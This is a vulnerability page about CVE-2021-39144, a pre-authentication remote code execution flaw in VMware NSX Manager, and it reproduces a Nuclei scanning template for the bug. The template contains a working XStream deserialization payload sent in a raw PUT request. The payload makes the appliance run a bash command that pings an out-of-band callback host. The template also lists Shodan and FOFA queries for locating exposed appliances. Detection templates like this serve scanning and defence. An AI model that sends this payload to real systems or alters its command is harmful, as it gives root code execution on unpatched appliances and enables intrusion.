vmware-nsx-stream-rce: VMware NSX Manager XStream Pre-authenticated Remote Code Execution

2025-08-01 VMware NSX PoC Public

Description

VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.

VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.

Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),

a malicious actor can get remote code execution in the context of 'root' on the appliance.

VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13

are vulnerable to Remote Command Injection.

PoC

id: vmware-nsx-stream-rce

info:
  name: VMware NSX Manager XStream Pre-authenticated Remote Code Execution
  author: _0xf4n9x_
  severity: high
  description: |
    VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.
    VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
    Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),
    a malicious actor can get remote code execution in the context of 'root' on the appliance.
    VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13
    are vulnerable to Remote Command Injection.
  reference:
    - https://www.vmware.com/security/advisories/VMSA-2022-0027.html
    - https://kb.vmware.com/s/article/89809
    - https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html
    - https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144
    - https://github.com/rapid7/metasploit-framework/pull/17222
  classification:
    cwe-id: CWE-78,CWE-502
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"VMware Appliance Management"
    fofa-query: title="VMware Appliance Management"
  tags: vmware,xstream,rce,msf,intrusive,vuln
variables:
  lowerrstr: "{{to_lower(rand_text_alpha(6))}}"

http:
  - raw:
      - |-
        PUT /api/2.0/services/usermgmt/password/{{lowerrstr}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <sorted-set>
          <string>foo</string>
          <dynamic-proxy>
            <interface>java.lang.Comparable</interface>
            <handler class="java.beans.EventHandler">
              <target class="java.lang.ProcessBuilder">
                <command>
                  <string>bash</string>
                  <string>-c</string>
                  <string>ping {{os}}.{{interactsh-url}}</string>
                </command>
              </target>
              <action>start</action>
            </handler>
          </dynamic-proxy>
        </sorted-set>

    payloads:
      os:
        - '-c 3 lin'
        - '-n 3 win'
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'deceptive request routing'

      - type: status
        status:
          - 400
# digest: 490a00463044022039ce484b8a14d10acf343ba146e02b8801868a45fe60f3337e3d3e1e603f5bef02207aaf00475a18bfbc28cca4829722e94ae9801a291660e43a00167b01bb030553:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities